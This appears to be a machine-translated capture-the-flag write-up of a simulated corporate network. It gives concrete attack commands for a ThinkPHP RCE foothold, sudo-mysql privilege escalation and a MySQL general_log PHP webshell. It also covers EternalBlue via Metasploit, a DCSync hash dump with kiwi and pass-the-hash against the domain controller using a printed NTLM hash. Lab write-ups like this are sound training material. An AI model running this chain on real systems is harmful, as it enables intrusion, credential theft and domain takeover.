Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Initial writeup

After turning on the target machine, there is a login interface with ThinkPHP icon. Just test it directly

exists 5.0.23 RCE

, let’s check the environment of PHP-7.4.3, take a look at the disable_functions

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_weexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_ha ndler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare

The transmission is immediately, the ant sword connection is www-data permission, so you have to find a way to increase the authority and enter /root

I found some articles under the official account I followed before. The Web Security Tools Library is quite complete,《Linux提权备忘录》

Try cat /etc/sudoers being told Permission denied, change to sudo -l to view

This website can provide reference for the command elevation

can be implemented using mysql, sudo mysql -e '! cat /root/flag/flag01.txt' get the first part of flag

ifconfig check IP

Pass fscan up and scan down section C,/fscan_amd64 -h 172.22.1.1/24, the result is in the current result.txt

172.22.1.18:3306 open

172.22.1.2:88 open

172.22.1.21:445 open

172.22.1.18:445 open

172.22.1.2:445 open

172.22.1.21:139 open

172.22.1.18:139 open

172.22.1.2:139 open

172.22.1.21:135 open

172.22.1.18:135 open

172.22.1.2:135 open

172.22.1.18:80 open

172.22.1.15:80 open

172.22.1.15:22 open

[*] 172.22.1.2 (Windows Server 2016 Datacenter 14393)

[+] 172.22.1.21 MS17-010 (Windows 7 Professional 7601 Service Pack 1)

[+] NetInfo:

[*]172.22.1.21

[-]XIAORANG-WIN7

[-]172.22.1.21

[+] NetInfo:

[*]172.22.1.18

[-]XIAORANG-OA01

[-]172.22.1.18

[+] NetInfo:

[*]172.22.1.2

[-]DC01

[-]172.22.1.2

[*] 172.22.1.2 [+]DC XIAORANG\DC01 Windows Server 2016 Datacenter 14393

[*] WebTitle:http://172.22.1.15 code:200 len:5578 title3:Bootstrap Material Admin

[*] 172.22.1.18 XIAORANG\XIAORANG-OA01 Windows Server 2012 R2 Datacenter 9600

[*] 172.22.1.21 __MSBROWSE__\XIAORANG-WIN7 Windows 7 Professional 7601 Service Pack 1

[*] WebTitle:http://172.22.1.18 code:302 len:0 title:None Jump url: http://172.22.1.18?m=login

[*] WebTitle:http://172.22.1.18?m=login code:200 len:4012 title:Sign call collaborative office system

[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

.15 doesn’t need to be seen,21 is a Win7 with the existence of Eternal Blue,18 is a system that calls OA, and .2 is a domain control

Forwarding with NPS+Proxifier proxy, first look at .18

Then there are two ways to do it. The first is to target a file upload vulnerability in the call OA. You can refer to the article of Master Y4tacker. Just use the weak password admin/admin123 to log in and just type exp.

The second method is to use /phpmyadmin to log in directly root/root, and then write to webshell using logs.

The first step is to execute show variables like 'general%'; check whether the log is enabled and the stored log location

Second step set global general_log=ON; turn on log

The third step set global general_log_file to set the log saving location

Finally select '?php eval($_POST[cmd]);';Write and then connect the ant sword, flag is under C:/Users/Administrators/flag

Next,21 is a Win7 machine. You can call MS17-010. After trying it, you can't leave the network. You can use forward monitoring.

First hang up the proxy, proxychains msfconsole to go socks5 traffic, and then use exploit/windows/smb/ms17_010_eternalblue=set payload windows/x64/meterpreter/bind_tcp_uuid=set RHOSTS 172.22.1.21=exploit

After obtaining a positive meterpreter shell, the next step is to use DCSync

You can refer to this article for the introduction of DCSync. The biggest feature is that it can obtain data on the domain control without logging in to the domain control.

directly load kiwi under MSF, and then kiwi_cmd 'lsadump:dcsync /domain:xiaorang.lab /all /csv' exit export Hash for all users in the domain

is scanned out before .2 and open the 445 port. Use smb hashing to pass it directly with the crackmapexec that comes with kali. proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x '$cmd', the last part of the flag is under /Users/Administrators/flag

Original link: http://119.45.47.125/index.php/2022/11/24/yunjing-4/